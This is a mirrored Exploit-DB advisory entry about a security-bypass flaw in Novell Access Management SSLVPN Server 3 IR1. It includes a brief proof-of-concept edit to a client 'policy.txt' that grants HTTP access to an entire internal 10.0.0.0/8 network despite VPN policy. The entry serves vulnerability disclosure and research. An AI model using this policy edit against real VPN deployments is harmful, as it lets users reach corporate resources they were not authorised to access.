bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/novell/remote/29699.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

19 lines
No EOL
662 B
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/22787/info
Novell Access Management SSLVPN Server is prone to a security-bypass vulnerability.
A remote authenticated attacker can exploit this issue to access corporate resources normally restricted within VPN access policy. This may lead to other attacks.
This issue affects version 3 IR1 of Novell Access Management Server.
A proof-of-concept modification to 'policy.txt' would be as follows:
sslize {
from : 0.0.0.0 / 0
to :10.0.0.0/255.0.0.0
port : 80
protocol :tcp
action :allow
};
The above example demonstrates how an attacker would allow their client machine HTTP access to any host on the remote network.
Reference in a new issue View git blame Copy permalink